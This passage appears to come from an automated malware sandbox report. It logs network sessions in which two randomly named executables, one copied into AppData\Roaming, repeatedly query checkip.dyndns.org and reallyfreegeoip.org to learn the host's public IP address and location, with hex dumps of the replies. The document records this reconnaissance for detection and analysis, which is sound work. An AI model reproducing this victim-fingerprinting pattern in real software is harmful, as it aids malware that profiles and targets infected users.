Oct 7, 2024 22:41:15.586885929 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:15.494924068 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:16.323551893 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49727	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:16.176058054 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:17.414197922 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49729	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:16.947520018 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:18.120951891 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49731	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:17.456722021 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 22:41:18.270153999 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49734	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:18.732151031 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 22:41:20.117151022 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:20.117259026 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:20.522958040 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49735	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:18.846898079 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:20.654438019 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49739	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:21.114135981 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 22:41:22.369800091 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49740	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:21.246566057 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 22:41:23.221664906 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49748	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:23.870141029 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 22:41:24.681845903 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:08 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:09 UTC	670	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2tE12GOsB1RhTCrgO5LfXxUlSXetI7MZlS670kANncZc4FJk3D2zPTJeRQ1%2FsXyvCwMl7M%2FF4dxLn3jCHuK3xfaQWiJSt0DX6%2FykSXylG929R7ORnMnMcFor58Vs1qrx6%2F18nEZK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5d488e54240-EWR
2024-10-07 20:41:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:09 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:09 UTC	670	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNeI69QWyqF80WZbI6WOEd752FmhQ0PtMPkKkn55By4Ht%2FfGdBrFW%2FnLDWd9qlZJZVc1AmXzOv0VFreS7yhlk8SozzEoG40bpxojHkQozvKcphDwmA5DwkvwlGxe5PaozhlrPlbk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5dcc8f60f8f-EWR
2024-10-07 20:41:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:11 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:11 UTC	702	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHzsV0hj8HdWIwkPDo%2B2IMnRQXahCAY0cgd%2FfQiUvXK0GXcpsbTT16vSif1vYonGfJzwn71SBhfXUafTTdvzABUVJJzhnLiy6jIkjyvvCQncA5YnEJcv2sHqs0haz9stKI5PE%2BT7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5e60abb8c89-EWR alt-svc: h3=":443"; ma=86400
2024-10-07 20:41:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:11 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:11 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2zTrEc2vEVZ72FTAfZmQWzvaqNQ3vfxvk%2Bd5srCao0NxXSDrbDMy2mkSiOHtvXIWBF8E9tZZrV%2Fohd0IZEx5HjxBJUeHUQ8O1orWWNeSq%2BEeNuVULxvhPKZNKkH6s4mG%2BU0NpEq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5e638be4269-EWR
2024-10-07 20:41:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49718	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:13 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:13 UTC	678	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiADSO4ulP63xhEO%2BFyaKwobPT%2FoHzN4nLORxjyporWD4U0Gt1%2FlUi%2BdPlQq8DkLC46aDDGTOEsLGaNM0o%2B2Yt4K6r5B6RbXp02BeP7ReSKfVQRa%2B2jg1aocn7XzIafhzvldkvUm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5f1fce27cab-EWR
2024-10-07 20:41:13 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49719	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:13 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:14 UTC	672	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0isMfeitH%2B3quOLYX3q0pYCJBinYbme7E3o%2BLwlvbOxo%2FQ30yNeoFozAu2VTXrmVAdrDGdfZLf73YCML8KYj38DyLJWXHqzvZujIuh51TXW3xVVhjs7fJL2SMivHosXOxh4EGihG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5f4ce8743c7-EWR
